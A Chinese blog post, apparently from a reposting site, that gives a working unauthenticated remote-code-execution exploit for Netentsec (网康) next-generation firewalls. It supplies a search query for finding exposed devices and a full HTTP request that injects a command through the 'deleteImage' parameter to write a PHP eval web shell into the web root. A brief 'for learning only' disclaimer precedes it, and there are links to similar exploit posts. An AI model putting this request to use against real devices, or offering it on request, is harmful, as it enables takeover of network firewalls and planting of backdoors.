美文网首页
网康防火墙前台RCE

网康防火墙前台RCE

作者: migrate_ | 来源:发表于2021-04-25 16:30 被阅读0次

仅供交流与学习使用,请勿用于非法用途,否则后果自负

引用大佬文章

https://xz.aliyun.com/t/9495

寻找目标

app="网康科技-下一代防火墙"

抓包改包(Host和Referer)

POST /directdata/direct/router HTTP/1.1
Host: xx.xx.xx
Cookie: PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xx.xx.xx.xx/user/login/index/logined/fail
Dnt: 1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Connection: close
Content-Length: 221

{
    "action": "SSLVPN_Resource",
    "method": "deleteImage",
    "data":[{
      "data":["/var/www/html/b.txt;echo '<?php @eval($_POST[a]);?>'>/var/www/html/test.php"]
    }],
    "type": "rpc",
    "tid": 17
}
1.jpg

访问shell

2.jpg

相关文章

  • 网康防火墙前台RCE

    仅供交流与学习使用,请勿用于非法用途,否则后果自负 引用大佬文章 寻找目标 抓包改包(Host和Referer) ...

  • XunRuiCMS 前台RCE漏洞

    本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。...

  • Apache Shiro RememberMe 反序列化

    漏洞背景 CVE-2016-4437/shiro-550,shiro<1.2.4,前台无回显RCE。 框架介绍:A...

  • THINKPHP5 远程命令执行

    漏洞背景 前台有回显RCE 框架介绍:ThinkPHP是一款运用极广的PHP开发框架。漏洞引入:1.其版本5中,由...

  • 2018-01-29 Linux学习之iptables与fire

    一、防火墙 1.什么是防火墙 防火墙指的是一个由软件和硬件设备组合而成、在内部网和外部网之间、专用网与公共网之间的...

  • TP5_RCE合集

    目录一、控制器名引起的RCE二、核心类Requests引起的RCE 一、控制器名引起的RCE 公开时间:2018/...

  • 【白盒】TP5_RCE合集

    目录一、控制器名引起的RCE二、核心类Requests引起的RCE 一、控制器名引起的RCE 公开时间:2018/...

  • 我对行为管理的认识

    我认为行为管理就是一个将策略设置简化的防火墙。 现在的行为管理,主要有两个品牌:网康与深信服 这两家,在设置和策略...

  • Android系统中实现网络防火墙的方法

    防火墙顾名思义就是作为内部网与外部网之间的一种访问控制设备, 常常安装在内部网和外部网交界点上。而网络防火墙是一个...

  • 第2.2章:React编程快捷键

    rce rconst sst bnd imp enf

网友评论

      本文标题:网康防火墙前台RCE

      本文链接:https://www.haomeiwen.com/subject/zigdrltx.html